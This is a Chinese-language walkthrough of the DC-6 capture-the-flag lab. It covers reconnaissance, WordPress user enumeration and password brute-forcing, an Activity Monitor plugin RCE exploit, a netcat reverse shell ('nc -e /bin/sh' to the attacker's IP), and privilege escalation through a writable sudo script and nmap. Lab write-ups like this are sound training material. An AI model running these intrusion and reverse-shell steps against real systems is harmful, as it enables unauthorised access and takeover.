DC-6靶机详解

一、主机发现

arp-scan -l

靶机ip为192.168.55.159

二、端口扫描、目录枚举、指纹识别、

2.1端口扫描

nmap 192.168.55.159

发现没有开放特殊端口

看来信息收集的重点要放在网页中了

2.2目录枚举

dirb http://192.168.55.159

2.3指纹识别

nmap 192.168.55.159 -sV -sC -O --version-all

三、进入靶机网页进行信息收集、反弹shell

此靶机需要域名映射，下载靶机时作者给出了方法，不再赘述

发现靶机的网页是wordpress

可以尝试wpscan工具对网站进行扫描

wpscan --url http://wordy/ 

发现wordpress的版本为5.1.1

尝试枚举用户名

wpscan --url http://wordy --enumerate u

枚举出来了5个用户名

接下来尝试使用密码字典进行爆破（下载地址中作者给出了相应的字典）

cp /usr/share/wordlists/rockyou.txt  1.txt （先将该密码复制到桌面上）
cat 1.txt | grep k01 > 2.txt  （根据作者提示筛选密码）

已经爆破出来了一个账号密码

mark
helpdesk01

成功进入靶机后台

发现了wordpress的一个插件

在kali中找此插件的漏洞

searchsploit Activity monitor

发现有远程代码执行漏洞

直接执行该exp即可，拿下低权限shell

python 50110.py

四、nmap提权

发现这个shell不稳定，使用cd命令就自动退出

重新反弹一个shell

nc -lvvp 4444
nc -e /bin/sh 192.168.55.132 4444
python -c "import pty;pty.spawn('/bin/bash')"

4.1靶机信息收集

uname -a
lsb_release -a

筛选一下SUID命令，尝试一下suid提权

find / -perm  -4000 -print 2>/dev/null

发现没有常用的命令，尝试其他思路

4.2登陆graham用户

进入home目录，发现靶机一共有四个用户

其中jens用户目录下有一个备份文件，此备份文件的权限很高，感觉此备份文件可能可以提权，尝试运行，发现无权限

继续查看其它用户的目录下的信息，发现mark用户下有一个员工的文件，看看里面的内容

发现graham用户的账号和密码

su graham
GSo7isUM1D4

4.3登陆jens用户

查看graham用户的sudo命令权限，发现jens用户不需要密码即可登陆

sudo -l

graham用户的权限能够使用backups.sh

将切换jens用户的命令追加到backup.sh中

echo '/bin/bash' >>backups.sh
sudo -u jens ./backups.sh

4.4nmap提权

一样的套路发现nmap这个命令没有密码

去提权网站查找namp提权的方式

尝试使用命令进行提权

提权成功！